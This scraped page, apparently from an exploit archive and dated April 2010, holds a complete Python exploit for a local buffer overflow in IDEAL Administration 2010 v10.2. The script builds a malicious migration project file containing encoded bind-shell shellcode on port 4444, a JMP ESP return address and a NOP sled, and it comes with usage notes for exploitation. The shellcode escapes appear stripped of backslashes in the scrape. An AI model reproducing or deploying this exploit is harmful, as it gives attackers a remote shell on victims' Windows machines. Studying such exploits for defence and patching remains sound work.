Home / os / win7

IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploi

Posted on 26 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================
IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit
=============================================================

#!/usr/bin/env python
 
#################################################################
#
# IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit
# Found By: Dr_IDE
# Usage:    Migrate -&gt; Open Migration Project -&gt; Bind Shell
# Download: www.pointdev.com
# Tested On:    Windows XPSP3
#
#################################################################
 
# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
sc = (
&quot;x89xe2xdbxccxd9x72xf4x5fx57x59x49x49x49x49x49&quot;
&quot;x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a&quot;
&quot;x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32&quot;
&quot;x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49&quot;
&quot;x4bx4cx42x4ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b&quot;
&quot;x4fx4bx4fx43x50x4cx4bx42x4cx51x34x46x44x4cx4b&quot;
&quot;x50x45x47x4cx4cx4bx43x4cx43x35x44x38x43x31x4a&quot;
&quot;x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51&quot;
&quot;x4ax4bx50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50&quot;
&quot;x31x49x50x4ax39x4ex4cx4bx34x49x50x44x34x43x37&quot;
&quot;x49x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47&quot;
&quot;x4bx50x54x46x44x46x48x44x35x4bx55x4cx4bx51x4f&quot;
&quot;x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c&quot;
&quot;x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b&quot;
&quot;x4dx59x42x4cx47x54x45x4cx43x51x49x53x50x31x49&quot;
&quot;x4bx43x54x4cx4bx47x33x46x50x4cx4bx47x30x44x4c&quot;
&quot;x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51&quot;
&quot;x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f&quot;
&quot;x4ex36x45x36x46x33x43x56x45x38x47x43x46x52x42&quot;
&quot;x48x43x47x42x53x46x52x51x4fx50x54x4bx4fx48x50&quot;
&quot;x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48&quot;
&quot;x56x51x4fx4dx59x4bx55x45x36x4bx31x4ax4dx43x38&quot;
&quot;x45x52x46x35x43x5ax45x52x4bx4fx48x50x45x38x49&quot;
&quot;x49x44x49x4ax55x4ex4dx51x47x4bx4fx48x56x51x43&quot;
&quot;x51x43x51x43x51x43x46x33x51x53x50x53x47x33x51&quot;
&quot;x43x4bx4fx4ex30x42x46x43x58x42x31x51x4cx45x36&quot;
&quot;x46x33x4bx39x4dx31x4cx55x45x38x4ex44x44x5ax42&quot;
&quot;x50x49x57x50x57x4bx4fx49x46x42x4ax44x50x50x51&quot;
&quot;x50x55x4bx4fx48x50x45x38x49x34x4ex4dx46x4ex4a&quot;
&quot;x49x46x37x4bx4fx4ex36x50x53x46x35x4bx4fx48x50&quot;
&quot;x43x58x4bx55x47x39x4cx46x50x49x46x37x4bx4fx48&quot;
&quot;x56x46x30x50x54x50x54x46x35x4bx4fx4ex30x4cx53&quot;
&quot;x42x48x4bx57x44x39x48x46x44x39x50x57x4bx4fx48&quot;
&quot;x56x51x45x4bx4fx4ex30x42x46x43x5ax42x44x42x46&quot;
&quot;x43x58x43x53x42x4dx4cx49x4bx55x43x5ax46x30x51&quot;
&quot;x49x51x39x48x4cx4dx59x4dx37x42x4ax51x54x4bx39&quot;
&quot;x4ax42x50x31x49x50x4ax53x4ex4ax4bx4ex50x42x46&quot;
&quot;x4dx4bx4ex50x42x46x4cx4ax33x4cx4dx43x4ax47x48&quot;
&quot;x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x42&quot;
&quot;x36x4bx4fx42x55x47x34x4bx4fx49x46x51x4bx50x57&quot;
&quot;x51x42x50x51x46x31x50x51x43x5ax43x31x50x51x50&quot;
&quot;x51x51x45x50x51x4bx4fx48x50x42x48x4ex4dx48x59&quot;
&quot;x45x55x48x4ex50x53x4bx4fx49x46x42x4ax4bx4fx4b&quot;
&quot;x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33&quot;
&quot;x48x44x45x34x4bx4fx49x46x50x52x4bx4fx4ex30x45&quot;
&quot;x38x4ax50x4dx5ax43x34x51x4fx51x43x4bx4fx4ex36&quot;
&quot;x4bx4fx4ex30x41x41&quot;)
 
head = (&quot;x0Dx0Ax5Bx47x72x6Fx75x70x2Cx45x78x70x6F&quot;
&quot;x72x74x2Cx59x65x73x5Dx0Dx0A&quot;);                # Project Header
buff = (&quot;x43x6fx6dx70x75x74x65x72x3D&quot;  + &quot;x41&quot; * 2420);   # XPSP3 EIP Overwrite
foot = (&quot;x0Dx0Ax5Bx45x6Ex64x5Dx0Dx0A&quot;);            # File Footer
retn = (&quot;x2Fx1DxF3x77&quot;);                        # JMP ESP
nops = (&quot;x90&quot; * 16);
 
try:
    print &quot;[*] Generating Evil Migrate File...&quot;
    f1 = open(&quot;unIDEAL2010.ipj&quot;,&quot;w&quot;);
    f1.write(head + buff + retn + nops + sc + foot);
    f1.close();
    print &quot;[*] File created successfully!&quot;
 
except:
    print &quot;[-] There was a problem writing the file.&quot;



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP